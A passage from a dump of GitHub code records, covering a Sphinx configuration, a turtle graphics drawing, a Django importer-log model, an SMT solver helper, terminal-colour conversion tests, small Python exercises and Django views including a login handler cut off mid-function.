falarm'\nauthor = 'linseypy, rivenmau, falarm'\nrelease = '1.0.0'\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\"sphinx.ext.autodoc\", \"sphinx.ext.napoleon\", 'sphinx.ext.coverage',]\n\nautodoc_default_options = {\n 'undoc-members': True,\n 'show-inheritance': True,\n}\n\n# Стиль docstrings (в данном случае, Google-style)\nnapoleon_google_docstring = True\nnapoleon_use_param = True\nnapoleon_use_ivar = True\nnapoleon_use_rtype = True\n\ntemplates_path = ['_templates']\nexclude_patterns = []\n\nlanguage = 'en'\n\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = 'sphinx_rtd_theme'\nhtml_static_path = ['_static']\n","repo_name":"Fuse23/python_bootcamp","sub_path":"Team01/src/docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22041165669","text":"import turtle as t\nimport math\nt.speed(100)\nt.up()\n\n\ndef square(a, color):\n ''' Русует квадрат стороной - а, возвращает в начальное положение + цвет '''\n t.down()\n t.color(color)\n t.begin_fill()\n for g in range(4):\n t.forward(a)\n t.right(90)\n t.end_fill()\n t.up()\n\n\ndef triangle(a, color):\n ''' Рисует р\\б, п\\у треугольник + цвета '''\n t.color(color)\n t.begin_fill()\n t.down()\n t.right(45)\n t.forward(a)\n t.left(90)\n t.forward(a)\n t.left(135)\n t.forward(math.sqrt(a ** 2 * 2))\n t.end_fill()\n t.up()\n t.left(180)\n\n\ndef main(a, b):\n ''' Главная фигура, координаты а,в '''\n # Рисуем каркас основной фигуры\n t.goto(a, b)\n square(10, 'black')\n t.goto(a + 90, b)\n square(10, 'black')\n t.goto(a, b - 90)\n square(10, 'black')\n t.goto(a + 90, b - 90)\n square(10, 'black')\n t.goto(a, b)\n t.down()\n t.right(45)\n t.forward(math.sqrt(20000))\n t.up()\n t.goto(a, b - 100)\n t.left(90)\n t.down()\n t.forward(math.sqrt(20000))\n t.right(45)\n t.up()\n t.goto(a + 40, b - 40)\n square(20, 'black')\n t.goto(a + 45, b - 45)\n square(10, 'white')\n # Каркас закончен\n\n # Рисуем галочки внутри фигуры\n t.goto(a, b)\n t.forward(20)\n triangle(math.sqrt(1800), 'red')\n t.goto(a, b)\n t.forward(30)\n triangle(math.sqrt(800), 'black')\n t.goto(a, b)\n t.forward(40)\n triangle(math.sqrt(200), 'white')\n # Верх - конец\n\n t.goto(a, b - 80)\n t.left(90)\n triangle(math.sqrt(1800), 'red')\n t.goto(a, b - 70)\n triangle(math.sqrt(800), 'black')\n t.goto(a, b - 60)\n triangle(math.sqrt(200), 'white')\n t.right(90)\n # Лево - конец\n\n t.goto(a + 100, b)\n t.right(90)\n t.forward(20)\n triangle(math.sqrt(1800), 'red')\n t.goto(a + 100, b)\n t.forward(30)\n triangle(math.sqrt(800), 'black')\n t.goto(a + 100, b)\n t.forward(40)\n triangle(math.sqrt(200), 'white')\n t.left(90)\n # Право - конец\n\n t.goto(a + 100, b - 100)\n t.left(180)\n t.forward(20)\n triangle(math.sqrt(1800), 'red')\n t.goto(a + 100, b - 100)\n t.forward(30)\n triangle(math.sqrt(800), 'black')\n t.goto(a + 100, b - 100)\n t.forward(40)\n triangle(math.sqrt(200), 'white')\n t.right(180)\n # Низ - конец\n\n\ndef cvetok(a, b, color):\n ''' Рисует цветок. а,в - координаты + цвет'''\n t.goto(a, b)\n t.down()\n square(15, color)\n t.down()\n t.goto(a + 7.5, b - 7.5)\n t.left(45)\n t.width(2)\n t.color('white')\n t.forward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.backward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.left(90)\n t.forward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.backward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.left(90)\n t.forward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.backward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.left(90)\n t.forward(math.sqrt(7.5 ** 2 * 2) + 2)\n t.up()\n t.left(45)\n t.goto(a + 7.5, b - 10.5)\n t.color('yellow')\n t.begin_fill()\n t.circle(3)\n t.end_fill()\n t.up()\n\n\ndef ramkaside(a, b, color):\n ''' Рисует сторону рамки, а в - начало координат + цвет '''\n t.goto(a, b)\n t.width(2)\n t.color('black')\n t.down()\n t.forward(400)\n t.backward(400)\n t.color(color)\n t.begin_fill()\n for r in range(10):\n t.right(45)\n t.forward(math.sqrt(800))\n t.left(90)\n t.forward(math.sqrt(800))\n t.right(45)\n t.end_fill()\n t.color('black')\n t.backward(400)\n for r in range(10):\n t.right(45)\n t.forward(math.sqrt(800))\n t.left(90)\n t.forward(math.sqrt(800))\n t.right(45)\n t.width(1)\n\n\n# Рисуем 9 основных фигур\nmain(0, 0)\nmain(100, 0)\nmain(-100, 0)\nmain(-100, -100)\nmain(0, -100)\nmain(100, -100)\nmain(-100, 100)\nmain(0, 100)\nmain(100, 100)\n# Конец\n\n# Обведем чтоб получше выглядело\nt.goto(-100, -200)\nt.left(90)\nt.down()\nt.color('black')\nt.forward(300)\nt.right(90)\nt.forward(300)\nt.right(90)\nt.forward(300)\nt.right(90)\nt.forward(300)\nt.right(180)\nt.up()\n\n# Рисуем цветочки\ncvetok(-120, -42.5, 'red')\ncvetok(-120, -142.50, 'red')\ncvetok(-120, 57.5, 'red')\n# Лево - конец\ncvetok(-57.5, 120, 'orange')\ncvetok(-57.5 + 100, 120, 'orange')\ncvetok(-57.5 + 200, 120, 'orange')\n# Верх - конец\ncvetok(205, 57.5, 'purple')\ncvetok(205, -42.5, 'purple')\ncvetok(205, -142.5, 'purple')\n# Право - конец\ncvetok(-57.5, -205, 'blue')\ncvetok(-57.5 + 100, -205, 'blue')\ncvetok(-57.5 + 200, -205, 'blue')\n# Низ - конец\n\n# Рисуем рамку\nramkaside(-150, 150, 'orange')\nt.right(90)\n# Верх - конец\nramkaside(250, 150, 'purple')\nt.right(90)\n# Право - конец\nramkaside(250, -250, 'blue')\nt.right(90)\n# Низ -конец\nramkaside(-150, -250, 'red')\n# Лево - конец\n\nt.right(90)\nt.done()\n","repo_name":"wartedorb/project1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"5282939287","text":"# coding=utf-8\n\"\"\"\nGeoSight is UNICEF's geospatial web-based business intelligence platform.\n\nContact : geosight-no-reply@unicef.org\n\n.. note:: This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU Affero General Public License as published by\n the Free Software Foundation; either version 3 of the License, or\n (at your option) any later version.\n\n\"\"\"\n__author__ = 'irwan@kartoza.com'\n__date__ = '13/06/2023'\n__copyright__ = ('Copyright 2023, Unicef')\n\nfrom django.conf import settings\nfrom django.contrib.gis.db import models\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom core.models.preferences import SitePreferences\nfrom geosight.importer.models.importer import Importer\n\n\nclass LogStatus(object):\n \"\"\"Quick access for coupling variable with Log status string.\"\"\"\n\n START = 'Start'\n RUNNING = 'Running'\n FAILED = 'Failed'\n SUCCESS = 'Success'\n\n\nclass ImporterLog(models.Model):\n \"\"\"History of Importer.\"\"\"\n\n importer = models.ForeignKey(Importer, on_delete=models.CASCADE)\n start_time = models.DateTimeField(auto_now_add=True)\n end_time = models.DateTimeField(blank=True, null=True)\n progress = models.IntegerField(default=0)\n status = models.CharField(\n max_length=100,\n choices=(\n (LogStatus.START, _(LogStatus.START)),\n (LogStatus.RUNNING, _(LogStatus.RUNNING)),\n (LogStatus.FAILED, _(LogStatus.FAILED)),\n (LogStatus.SUCCESS, _(LogStatus.SUCCESS)),\n ),\n default=LogStatus.START\n )\n note = models.TextField(blank=True, null=True)\n\n class Meta: # noqa: D106\n ordering = ('-start_time',)\n\n def send_alert(self):\n \"\"\"Send alert.\"\"\"\n from geosight.importer.models.importer import ImporterAlert\n pref = SitePreferences.preferences()\n if not self.importer.job:\n return\n\n emails = []\n if self.importer.creator.email:\n emails.append(self.importer.creator.email)\n if self.status == LogStatus.START:\n emails.extend(\n ImporterAlert.objects.filter(\n importer=self.importer,\n on_start=True\n ).values_list('email', flat=True)\n )\n elif self.status == LogStatus.FAILED:\n emails.extend(\n ImporterAlert.objects.filter(\n importer=self.importer,\n on_failure=True\n ).values_list('email', flat=True)\n )\n elif self.status == LogStatus.SUCCESS:\n emails.extend(\n ImporterAlert.objects.filter(\n importer=self.importer,\n on_success=True\n ).values_list('email', flat=True)\n )\n\n # Send email\n if emails:\n log_url = reverse(\"admin-importer-log-detail-view\", args=[self.pk])\n try:\n status = self.status\n if status == LogStatus.START:\n status = 'Started'\n context = {\n 'name': self.importer.__str__(),\n 'status': status.lower(),\n 'url': f'{pref.site_url}{log_url}'\n }\n\n message = render_to_string(\n 'emails/log_notification.html',\n context\n )\n send_mail(\n f'Importer \"{self.importer.__str__()}\" is {status}',\n None,\n settings.DEFAULT_FROM_EMAIL,\n list(emails),\n html_message=message,\n fail_silently=True,\n )\n except Exception:\n pass\n\n\nclass ImporterLogData(models.Model):\n \"\"\"Data that is found on the importer.\n\n It will also be used for review one.\n When imported, delete the data.\n \"\"\"\n\n log = models.ForeignKey(ImporterLog, on_delete=models.CASCADE)\n data = models.JSONField()\n note = models.JSONField(null=True)\n saved = models.BooleanField(\n default=False, help_text=\"Is the data saved to actual model.\"\n )\n\n @property\n def status(self):\n \"\"\"Return status.\"\"\"\n in_warning = False\n if self.note:\n note_keys = list(self.note.keys())\n try:\n note_keys.remove('warning')\n if not len(note_keys):\n in_warning = True\n except ValueError:\n pass\n\n if self.saved:\n return 'Saved'\n elif in_warning:\n return 'Warning'\n elif self.note and self.note.keys():\n return 'Error'\n return 'Review'\n\n\nclass ImporterLogDataSaveProgress(models.Model):\n \"\"\"Progress on saving data.\"\"\"\n\n log = models.ForeignKey(ImporterLog, on_delete=models.CASCADE)\n target_ids = models.JSONField()\n saved_ids = models.JSONField(default=list)\n note = models.JSONField(null=True)\n done = models.BooleanField(default=False)\n\n def run(self):\n \"\"\"Run the log.\"\"\"\n log_datas = self.log.importerlogdata_set.filter(\n id__in=self.target_ids\n )\n importer = self.log.importer.importer(self.log)\n for log_data in log_datas:\n importer._save_log_data_to_model(log_data)\n self.saved_ids.append(log_data.id)\n self.save()\n self.delete()\n","repo_name":"unicef-drp/GeoSight-OS","sub_path":"django_project/geosight/importer/models/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"36841534908","text":"\nfrom pysmt.shortcuts import Solver\nfrom tarski.theories import has_theory\nfrom tarski.syntax.ops import compute_sort_id_assignment\n\n\nclass SMTTranslator:\n def __init__(self, smtlang, static_symbols, action_names):\n self.smtlang = smtlang\n self.static_symbols = static_symbols\n self.action_names = action_names\n\n assert has_theory(smtlang, \"arithmetic\")\n\n # Compute a sort-contiguous object ID assignment\n self.sort_bounds, self.object_ids = compute_sort_id_assignment(self.smtlang)\n\n\ndef solve(theory, solver_name):\n \"\"\" \"\"\"\n # with tempfile.NamedTemporaryFile(mode='w+t', delete=False) as f:\n # for t in theory:\n # print(t, file=f)\n # print(f'Theory printed on file {f.name}')\n\n # with Solver(logic=\"UFIDL\") as solver:\n with Solver(name=solver_name) as solver:\n # is_sat = solver.is_sat(And(theory)) # Alternatively\n\n print(f'Using solver \"{solver_name}\" configured with logic {solver.logic}')\n\n for sentence in theory:\n solver.add_assertion(sentence)\n\n solvable = solver.solve()\n if not solvable:\n return None\n\n return solver.get_model()\n","repo_name":"aig-upf/fstripssmt","sub_path":"src/fstripssmt/solvers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"42469531393","text":"import durationpy\nimport validators\nimport yaml\n\n\nclass Config(object):\n def __init__(self, path):\n with open(path, \"r\") as f:\n try:\n loader = yaml.FullLoader\n except AttributeError:\n loader = yaml.Loader\n data = yaml.load(f, Loader=loader)\n self.services = dict([(k, ServiceConfig(k, **v)) for k, v in data['services'].items()])\n self.shims = dict([(k, ShimConfig(k, **v)) for k, v in data['shims'].items()])\n\n def service(self, name='default'):\n return self.services[name]\n\n def shim(self, name='default'):\n return self.shims[name]\n\n\nclass ServiceConfig(object):\n def __init__(self, name, **kwargs):\n if not name:\n raise Exception('missing name')\n\n self.name = name\n\n def set_str(k, v):\n self.__dict__[k] = str(v)\n\n def set_url(k, v):\n v = str(v)\n if not validators.url(v):\n raise ValueError('%s service config has invalid url: %s' % (name, v))\n self.__dict__[k] = v\n\n def set_duration(k, v):\n v = str(v)\n try:\n # d is a datetime.timedelta\n d = durationpy.from_str(v)\n except Exception:\n raise ValueError('%s service config has invalid duration: %s' % (name, v))\n self.__dict__[k] = d\n\n setters = {\n 'command': set_str,\n 'command_args': set_str,\n 'stop_command': set_str,\n 'base_url': set_url,\n 'init_url': set_url,\n 'init_timeout': set_duration,\n }\n\n for k, v in kwargs.items():\n setter = setters.get(k)\n if not setter:\n raise KeyError('%s service config has unknown property: %s' % (name, k))\n setter(k, v)\n\n for k in ('command', 'base_url'):\n if k not in self.__dict__:\n raise Exception('%s service config is missing required property: %s' % (name, k))\n\n\nclass ShimConfig(object):\n def __init__(self, name, **kwargs):\n if not name:\n raise AttributeError('missing name')\n\n self.name = name\n\n def set_str(k, v):\n self.__dict__[k] = str(v)\n\n setters = {\n 'path': set_str,\n 'trace': set_str\n }\n\n for k, v in kwargs.items():\n setter = setters.get(k)\n if not setter:\n raise KeyError('%s shim config has unknown property: %s' % (name, k))\n setter(k, v)\n","repo_name":"Spirent/openperf","sub_path":"tests/aat/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"92"} +{"seq_id":"42503347551","text":"number = int(input())\nsum_1 = 0\nsum_2 = 0\nmax_diff = 0\nfor i in range(number):\n first = int(input())\n second = int(input())\n if i == 0:\n sum_1 = first + second\n if i % 2 == 0:\n sum_1 = first + second\n else:\n sum_2 = first + second\n if sum_1 > sum_2 and i != 0:\n max_diff = sum_1 - sum_2\n elif sum_2 > sum_1 and i != 0:\n max_diff = sum_2 - sum_1\nif max_diff == 0:\n print(f\"Yes, value={sum_1}\")\nelse:\n print(f\"No, maxdiff={abs(max_diff)}\")\n","repo_name":"IvaVangelova/SoftUni-Python-Basic","sub_path":"15_more_exercises/05_for_loop/08_equal_pairs.py","file_name":"08_equal_pairs.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"26488970478","text":"TAILLE_PLATEAU = 5\nBOARD_ONE = 1\nBOARD_TWO = 2\n\n\nclass BOARD:\n def __init__(self):\n self.__board_P1 = []\n self.__board_P2 = []\n \n self.__board_v_p1 = []\n self.__board_v_p2 = []\n \n \n def build_board(self, B):\n for i in range(TAILLE_PLATEAU):\n elem = []\n for j in range(TAILLE_PLATEAU):\n elem.append(0)\n if B == 1:\n self.__board_P1.append(elem)\n elif B == 2:\n self.__board_P2.append(elem)\n elif B == 3:\n self.__board_v_p1.append(elem)\n else:\n self.__board_v_p2.append(elem)\n \n if B == 1:\n return self.__board_P1\n elif B == 2:\n return self.__board_P2\n elif B == 3:\n return self.__board_v_p1\n else:\n return self.__board_v_p2\n \n def affiche_board_p1(self):\n print(\" \" + \" -\"*TAILLE_PLATEAU + \" \" + \" -\"*TAILLE_PLATEAU)\n for i in range(TAILLE_PLATEAU):\n print(\" | \", end=\"\")\n for j in range(TAILLE_PLATEAU):\n char = self.affiche_place((i, j), BOARD_ONE)\n print(char, end=\" \")\n self.affiche_board_p2(i, BOARD_TWO)\n \n def affiche_board_p2(self, i, BOARD_TWO):\n print(\"| \",end=\"\")\n for j in range(TAILLE_PLATEAU):\n char = self.affiche_place((i, j), BOARD_TWO)\n print(char, end=\" \")\n print(\"| \")\n if j == TAILLE_PLATEAU - 1 and i == TAILLE_PLATEAU - 1:\n print(\" \" + \" -\"*TAILLE_PLATEAU + \" \" + \" -\"*TAILLE_PLATEAU)\n print(\" \"*TAILLE_PLATEAU + \" p1 \" + \" \"*2*TAILLE_PLATEAU + \"p2\")\n \n def affiche_place(self, place, board):\n if board == 1:\n return self.__board_P1[place[0]][place[1]]\n else:\n return self.__board_P2[place[0]][place[1]]\n \n def set_board(self, place, modif, board):\n if board == 1:\n self.__board_P1[place[0]][place[1]] = modif\n else:\n self.__board_P2[place[0]][place[1]] = modif\n \n def taille_p(self):\n #print(\"%%%%\",len(self.__board_P1))\n return len(self.__board_P1)\n \nif __name__ == \"__main__\":\n B = BOARD()\n B.build_board_p1()\n B.build_board_p2()\n B.affiche_board_p1()","repo_name":"Atra0003/bataille_navalle","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4720710452","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\n\nfood = map(int, input().split())\n\nd = [0]*100\n\nd[0] = food[0]\nd[1] = max(food[0],food[1])\n\nfor i in range(2,n):\n d[i] = max(d[i-2]+food[i], d[i-1])\n\n\nprint(d[n-1])","repo_name":"inistory/daily_coding","sub_path":"이것이코딩테스트다/5. DP/개미전사/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"11224603211","text":"from more_termcolor import convert, core\nfrom more_termcolor.tests import common\nimport re\nfrom itertools import permutations\n\n\ndef test__to_code__sanity():\n for color, code in core.FORMATTING_COLOR_CODES.items():\n assert convert.to_code(color) == code\n \n for color, code in core.FOREGROUND_COLOR_CODES.items():\n assert convert.to_code(color) == code\n \n for color, code in core.BRIGHT_FOREGROUND_COLOR_CODES.items():\n assert convert.to_code(f'bright {color}') == code\n \n for color, code in core.BACKGROUND_COLOR_CODES.items():\n assert convert.to_code(f'on {color}') == code\n \n for color, code in core.RESET_COLOR_CODES.items():\n assert convert.to_code(f'reset {color}') == code\n \n for color, code in core.BRIGHT_BACKGROUND_COLOR_CODES.items():\n assert convert.to_code(f'on bright {color}') == code\n\n\ndef test__to_code__from_code():\n for color, code in core.FORMATTING_COLOR_CODES.items():\n assert convert.to_code(color) == convert.to_code(code)\n \n for color, code in core.FOREGROUND_COLOR_CODES.items():\n assert convert.to_code(color) == convert.to_code(code)\n \n for color, code in core.BRIGHT_FOREGROUND_COLOR_CODES.items():\n assert convert.to_code(f'bright {color}') == convert.to_code(code)\n \n for color, code in core.STANDARD_BACKGROUND_COLOR_CODES.items():\n assert convert.to_code(f'on {color}') == convert.to_code(code)\n \n for color, code in core.RESET_COLOR_CODES.items():\n assert convert.to_code(f'reset {color}') == convert.to_code(code)\n \n for color, code in core.BRIGHT_BACKGROUND_COLOR_CODES.items():\n assert convert.to_code(f'on bright {color}') == convert.to_code(code)\n\n\ndef test__to_code__edge_cases():\n with common.assert_raises(KeyError, 'grin'):\n convert.to_code('grin')\n with common.assert_raises(KeyError, 'brightblue'):\n convert.to_code('brightblue')\n with common.assert_raises(KeyError, 'brightblue'):\n convert.to_code('on brightblue')\n\n\ndef test__to_code__docstring_examples():\n assert convert.to_code('green') == '32'\n assert convert.to_code('on red') == '41'\n assert convert.to_code('on bright yellow') == '103'\n assert convert.to_code(32) == '32' == convert.to_code('32')\n\n\n@common.print_and_compare\ndef test__to_color__sanity():\n for color, code in core.FORMATTING_COLOR_CODES.items():\n actual = convert.to_name(code)\n try:\n yield actual, color\n except AssertionError as e:\n print()\n # aliases\n if (actual, color) not in (\n ('ita', 'italic'),\n ('ul', 'underline'),\n ('conceal', 'concealed'),\n ('ol', 'overline'),\n ):\n raise\n \n for color, code in core.FOREGROUND_COLOR_CODES.items():\n actual = convert.to_name(code)\n try:\n yield actual, color\n except AssertionError as e:\n if (actual, color) != ('black', 'grey'):\n raise\n \n for color, code in core.BRIGHT_FOREGROUND_COLOR_CODES.items():\n actual = convert.to_name(code)\n expected = f'bright {color}'\n try:\n yield actual, expected\n except AssertionError as e:\n if (actual, expected) != ('bright black', 'bright grey'):\n raise\n \n for color, code in core.STANDARD_BACKGROUND_COLOR_CODES.items():\n actual = convert.to_name(code)\n expected = f'on {color}'\n try:\n yield actual, expected\n except AssertionError as e:\n if (actual, expected) != ('on black', 'on grey'):\n raise\n \n for color, code in core.BRIGHT_BACKGROUND_COLOR_CODES.items():\n actual = convert.to_name(code)\n expected = f'on bright {color}'\n try:\n yield actual, expected\n except AssertionError as e:\n if (actual, expected) != ('on bright black', 'on bright grey'):\n raise\n \n for color, code in core.RESET_COLOR_CODES.items():\n actual = convert.to_name(code)\n expected = f'reset {color}'\n try:\n yield actual, expected\n except AssertionError as e:\n # same reset codes, different colors (or aliases)\n if (actual, expected) not in ((f'reset {pair[0]}', f'reset {pair[1]}') for pair in (\n ('bold', 'dark'),\n ('ita', 'italic'),\n ('ul', 'underline'),\n ('ul', 'doubleul'),\n ('blink', 'fastblink'),\n ('conceal', 'concealed'),\n ('frame', 'circle'),\n ('ol', 'overline'),\n )):\n raise\n\n\ndef test__to_color__docstring_examples():\n assert convert.to_name(32) == 'green' == convert.to_name('32')\n assert convert.to_name(41) == 'on red' == convert.to_name('41')\n assert convert.to_name(103) == 'on bright yellow' == convert.to_name('103')\n assert convert.to_name('green') == 'green'\n\n\n@common.print_and_compare\ndef test__to_code__fonts():\n actual = convert.to_code('10')\n expected = '10'\n return actual, expected\n\n\ndef test__to_reset_code__valid_values():\n assert convert.to_reset_code('1') == '22'\n assert convert.to_reset_code('reset 1') == '22'\n assert convert.to_reset_code('bold') == '22'\n assert convert.to_reset_code('dark') == '22'\n assert convert.to_reset_code(22) == '22' == convert.to_reset_code('22')\n assert convert.to_reset_code('green') == '39' == core.RESET_COLOR_CODES['fg']\n assert convert.to_reset_code('reset green') == '39' == core.RESET_COLOR_CODES['fg']\n assert convert.to_reset_code('on red') == '49'\n assert convert.to_reset_code('reset on red') == '49'\n assert convert.to_reset_code('bright red') == '39'\n assert convert.to_reset_code('reset bright red') == '39'\n assert convert.to_reset_code('on bright yellow') == '49'\n assert convert.to_reset_code('reset on bright yellow') == '49'\n assert convert.to_reset_code('on') == '49'\n assert convert.to_reset_code('reset on') == '49'\n\n\ndef test__to_reset_code__bad_values():\n for bad in ('BAD', 'on BAD', 'on bright BAD'):\n with common.assert_raises(KeyError, f\"to_reset_code('{bad}'): color '{bad}' isn't recognized\"):\n # convert.to_reset_code(bad, trace_call=bad != 'BAD')\n convert.to_reset_code(bad)\n \n with common.assert_raises(KeyError, 'bright'):\n convert.to_reset_code('bright')\n \n with common.assert_raises(KeyError):\n convert.to_reset_code('on bright dark')\n convert.to_reset_code('on dark')\n convert.to_reset_code('on bright all')\n\n\n@common.print_and_compare\ndef test__to_boundary():\n for code in (1, '1', 'bold'):\n actual = convert.to_boundary(code)\n expected = '\\x1b[1m'\n yield actual, expected\n \n actual = convert.to_boundary(1, '2', 'on bright black')\n # expected = re.compile(common.codes_perm(1, 2, 100))\n expected = \"\\x1b[1;2;100m\"\n yield actual, expected\n","repo_name":"giladbarnea/more_termcolor","sub_path":"more_termcolor/tests/test__convert.py","file_name":"test__convert.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"2574483119","text":"import pandas as pd \n\npath_landmarks = \"../data/Illinois/Info/summary_lm.csv\"\npath_machine_guess = \"../transfer_learning/machine_guess.csv\"\npath_wiki_info = \"../data/Illinois/Illinois_wiki.csv\"\n\n# By Cooper Nederhood (original)\n\ndef create_template(path_landmarks, path_machine_guess, output_filename, path_wiki_info = None):\n\t'''\n\tData relevant for the quiz template resides in 2 locations, possible 3 \n\tdepending on how the wiki data was pulled. Gather this information and\n\tprepare in format easiest to incorporate into Django. Save as csv (pipe delimited)\n\n\tInputs:\n\t\t- path_landmarks: (str) path to landmark 'summary_lm.csv'\n\t\t- path_machine_guess: (str) path to ML alogrithm guess\n\t\t- output_filename: (str) name of output file\n\t\t- path_wiki_info: (str) if wiki data added after, path to wiki info\n\n\t'''\n\n\tneed_wiki = path_wiki_info != None\n\n\tif need_wiki == True:\n\t\tdf_landmarks = pd.read_csv(path_landmarks, delimiter=\"|\", usecols=['id', 'name', 'test_image_url'])\n\t\tdf_wiki = pd.read_csv(path_wiki_info, delimiter=\"|\")\n\telse:\n\t\tdf_landmarks = pd.read_csv(path_landmarks, delimiter=\"|\", usecols=['id', 'name', 'test_image_url', 'wiki_url', 'wiki_summary'])\n\n\tdf_machine = pd.read_csv(path_machine_guess)\n\n\tmerge_df = df_landmarks.merge(df_machine, on='id', how='outer')\n\tif need_wiki == True:\n\t\tmerge_df = merge_df.merge(df_wiki, on='id', how='outer')\n\n\t# decode the machine guess by merging on the landmark file\n\tmerge_df.rename( columns={\"id\":'num_id', \"name\": \"name_landmark\", \"machine_guess\":\"id\"}, inplace = True)\n\tmerge_df = merge_df.merge(df_landmarks[['id', 'name']], on='id', how='outer')\n\tmerge_df.rename( columns={\"id\":'num_id', \"name\": \"machine_guess_name\", \"id\":\"machine_guess\"}, inplace = True)\n\n\tmerge_df['num_id'] = merge_df['num_id'].str.replace(\"lm\", \"\")\n\tmerge_df['num_id'] = pd.to_numeric(merge_df['num_id'], errors='coerce') \n\n\tmerge_df['machine_guess'] = merge_df['machine_guess'].str.replace(\"lm\", \"\")\n\tmerge_df['machine_guess'] = pd.to_numeric(merge_df['machine_guess'], errors='coerce') \n\n\torder = ['num_id', 'name_landmark', 'machine_guess', 'machine_guess_name', 'score', 'test_image_url', 'wiki_url', 'wiki_summary']\n\tmerge_df = merge_df[order]\n\tmerge_df.sort_values('num_id', inplace=True)\n\n\n\tmerge_df = merge_df[ pd.isnull(merge_df.num_id) == False]\n\n\n\tmerge_df.to_csv(output_filename, sep=\"|\", index=False)\n\n\treturn merge_df, df_landmarks, df_machine, df_wiki\n\nmerge_df, df_landmarks, df_machine, df_wiki = create_template(path_landmarks, path_machine_guess, \"template.csv\", path_wiki_info)\n","repo_name":"w4rner/IMAGEine","sub_path":"django_shell/get_csv_info.py","file_name":"get_csv_info.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36915762771","text":"import random\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom roles.models import Homonym, AgentNoun\n\n\nlevels = [\n 'senior',\n 'junior',\n 'rockstar',\n 'acting',\n 'lead',\n 'quantitative',\n 'full stack',\n]\n\n\ndef home(request):\n level = request.GET.get('level', random.choice(levels))\n\n agent_noun = request.GET.get('agent_noun', AgentNoun.objects.raw('''\n select * from {0} limit 1\n offset floor(random() * (select count(*) from {0}))\n '''.format(AgentNoun._meta.db_table))[0].word)\n\n homonym = request.GET.get('noun', Homonym.objects.raw('''\n select * from {0} limit 1\n offset floor(random() * (select count(*) from {0}))\n '''.format(Homonym._meta.db_table))[0].word)\n\n context = {\n 'level': level,\n 'agent_noun': agent_noun,\n 'noun': homonym\n }\n\n if request.is_ajax():\n return JsonResponse(context)\n\n return render(request, 'home.html', context=context)\n","repo_name":"Joeboy/yournextrole","sub_path":"roles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31764872931","text":"from django.shortcuts import render, render_to_response,redirect\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom mongoengine import *\n#from django.contrib.auth import authenticate\nfrom mongoengine.django.auth import User, Permission\nfrom django.contrib import messages\n\n\nfrom .models import Usuario\nfrom corpus.models import *\nfrom archivos.models import *\n\ndef test(request):\n \n tag = '5591ead23d878a0556ce9d02'\n a = Anidados.objects(corpus='5591eb2a3d878a0556ce9e02')\n b = Anidados.objects(tags__Estrato='N')\n c = Anidados.objects(tags__Descripción__contains='de')\n d = Anidados.objects(ref=tag,tags__Descripción__contains='Bogotá')\n e = Anidados.objects(ref=tag)\n print(len(e))\n print(len(d))\n #for an in c:\n #print(an.tags['Descripción'])\n #print('--------------------------')\n print('**************************************************************')\n for an in d:\n print(an.tags['Descripción'])\n print('--------------------------')\n print('sirve')\n\n return redirect('index')\n\n\ndef login(request):\n from django.contrib.auth import login\n from mongoengine.django.auth import User\n from mongoengine.queryset import DoesNotExist\n from django.contrib import messages\n \n \n if request.user.is_authenticated():\n return redirect('index')\n \n try:\n usuario = request.POST.get('user',False)\n pswd = request.POST.get('password',False)\n user = Usuario.objects.get(username=usuario)#request.POST['username'])\n print(user)\n if user.check_password(pswd):#request.POST['password']):\n user.backend = 'mongoengine.django.auth.MongoEngineBackend'\n request.session.set_expiry(60 * 60 * 1) # 1 hour timeout\n print(login(request, user))\n return redirect('index')\n else:\n messages.add_message(request,messages.ERROR,u\"¡Password incorrecto! Por favor introduzca el password correcto\")\n\n except DoesNotExist:\n messages.add_message(request,messages.ERROR,u\"¡El usuario no existe! Por favor intente con otro\")\n\n template = 'login/index.html'\n return 